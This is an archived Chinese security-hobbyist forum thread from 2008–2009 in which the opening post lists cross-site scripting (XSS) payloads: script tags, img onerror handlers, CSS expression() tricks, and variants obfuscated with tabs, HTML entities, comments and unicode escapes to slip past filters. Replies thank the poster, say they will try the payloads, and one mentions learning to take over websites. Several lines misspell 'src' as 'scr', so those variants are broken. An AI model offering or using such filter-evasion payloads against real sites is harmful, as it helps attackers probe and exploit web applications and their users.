Board logo

标题: 总结整理出来的一些跨站代码 [打印本页]

作者: 柔肠寸断    时间: 2008-8-6 23:54     标题: 总结整理出来的一些跨站代码

<script>alert("跨站")</script>    (最常用)
<img scr=javascript:alert("跨站")></img>
<img scr="javascrip&#116&#58 alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
unicode <div style="{left:expRessioN (alert('xss'))}">
作者: 劳资是怪物    时间: 2008-8-7 15:51

偷了,,,去试试。。:)
作者: 54subiao    时间: 2008-8-7 22:58

现在对这方面还不懂。
不知等我C 有小成之后是不是能搞得明白:call: :call:
作者: hackrui    时间: 2008-8-15 15:02

恩..这个不错..
作者: 无道亦道    时间: 2008-8-16 20:18

看不懂   先收藏下   :D
作者: 3ast    时间: 2009-2-9 15:48

收藏了咯
作者: skyme    时间: 2009-4-18 11:05

试试!谢谢楼主啊
作者: EndTo偌枫    时间: 2009-7-6 01:19

学习了,,现在正在学习如何拿站
作者: 学徒    时间: 2009-9-18 15:54

不错,看懂了部分,vbjavascript还的学!




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./) Powered by Discuz! 7.2